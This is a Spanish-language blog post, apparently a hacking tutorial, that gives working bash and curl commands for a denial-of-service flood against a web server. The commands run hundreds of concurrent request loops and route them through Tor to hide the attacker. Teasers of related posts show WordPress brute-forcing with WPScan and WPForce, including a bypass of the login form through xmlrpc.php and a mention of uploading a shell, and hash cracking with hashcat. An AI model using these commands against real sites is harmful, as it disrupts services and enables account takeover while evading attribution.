Ir al contenido principal

Ejemplos de ataque DOS con Curl y Tor

Es posible realizar un ataque DOS (sin necesidad de que sea distribuído, sin herramientas especiales y con una conexión común), valiéndonos solamente de CURL para realizar miles de peticiones simultáneas  y TOR para ocultar nuestro rastro. Basicamente un ataque a la capa de aplicación.

¿Cómo? con curl, realizando múltiples peticiones por segundo y concurrentes, atacando al servidor web, aunque por lo general lo que termina consumiendo toda la memoria de la víctima es la base de datos que la web utiliza.

Un ejemplo simple sería el siguiente:

Enviamos 1000 peticiones con Curl:
curl -s "http://victima.com/algo.php?[1-1000]"

Si queremos que éstas peticiones sean a su vez concurrentes, entonces deberíamos poner en segundo plano cada llamada a curl tantas veces como concurrencias se necesiten. 

Ejemplo: 

curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"
curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"
curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"


O bien podemos automatizarlo con un FOR en bashscript:  en este caso realizamos 1000 peticiones con 500 peticiones concurrentes.

for i in `seq 1 500`; do
  curl -s http://victima.com/algo.php?[1-1000] & pidlist="$pidlist $!"
done



Por otro lado, utilizamos TOR para ocultar nuestro rastro, aunque ésto hace menos efectivo el ataque

La forma de hacder una petición con curl a travez del proxy de TOR es la siguiente:

curl --socks5-hostname 127.0.0.1:9150 http//victima.com

Por lo tanto si queremos hacer múltiples peticiones (utilizando el primer ejemplo de curl) a travez del proxy de TOR, sería algo como lo siguiente:
curl -s --socks5-hostname 192.168.0.1:9150 "http://victima.com/algo.php?[1-1000]"



¿Dudas o sugerencias?

Comentarios

Entradas populares de este blog

Ataque por Fuerza Bruta a Wordpress

En éste pequeño tutorial mostraré como hacer un ataque de fuerza bruta   o bruteforce (es decir, probar muchas combinaciónes de usuario/clave por segundo) para obtener acceso en cualquier Wordpress .   No hace falta ser un "hacker" para ésta tarea ya que solo estamos utilizando una herramienta.  Publico éste tutorial con fines didácticos para que otros puedan probar la fortaleza de sus propios sitios y principalmente para concientizar de que nada es seguro en internet, a menos que nosotros lo hagamos seguro. Si bien existen infinidad de herramientas, o incluso hasta podríamos hacerlo manualmente con curl + bashscript,  el software por exclencia es WPScan y lo pueden bajar desde: https://github.com/wpscanteam/wpscan WPScan permite: listar vulnerabilidades, listar plugins, themes, y nombres de usuarios y principalmente realizar ataques de fuerza bruta de una forma sencilla y rápida. Al correr por primera vez WPScan nos pedirá actualizarlo en primer lugar y luego com

Como romper una clave encriptada de Wordpress con Hashcat

Aunque en futuras publicaciónes voy a profundizar mas en cracking de claves con Hashcat y John The Ripper (y principalmente claves de todo tipo de sistemas, con diferentes algorítmos y hashes), en ésta ocasión solo me limito a explicar como romper una clave encriptada de Wordpress . Hashcat es la herramienta por excelencia para romper claves, con infinidad de opciónes y principalmente porque aprovecha muchas características avanzadas del procesador (CPU o GPU). Al grano: dependiendo que version de Wordpress o que configuración tenga, la encriptación puede variar, aunque son casos aislados. Mayormente romperíamos una clave fácilmente como se ve a continuación con las opciónes por defecto. hashcat -m 400 -o fichero_de_resultados_obtenidos.txt  ficheros_de_hashes.txt diccionario.txt Como se puede ver especificamos un fichero donde se guardarán los resultados, otro fichero con los hashes (un solo hash o muchos separados por línea) y por último un diccionario de las claves a pr

Ataque de Brute Force a Wordpress sin formulario de Login

Existen diversas formas para realizar un bruteforce a Wordpress sin necesidad de utilizar el formulario de login.  Imaginemos que el formulario de login esté deshabilitado o protegido o con captcha,  todavía nos quedan otros recursos. 1) Atacar el wp-admin/admin-ajax.php 2) Atacar el xmlrpc.php De ésta forma es posible saltarse los mecanismos de seguridad como captchas o formularios deshabilitados u otros recursos. A continuación hago una breve revisión de una interesante herramienta que utilicé para dicha tarea.   Esta herramienta se llama WPforce y se puede descargar desde la siguiente dirección: https://github.com/n00py/WPForce Su sintáxis es tan sencilla como hacer lo siguiente: python wpforce.py -i diccionario-de-usuarios.txt -w diccionario-de-claves.txt -u "http://www.victima.com" WPForce permite realizar ataques de fuerza bruta directamente hacia el API de wordpress mediante xmlrpc.php , entre otras cosas también permite subir una shell al serv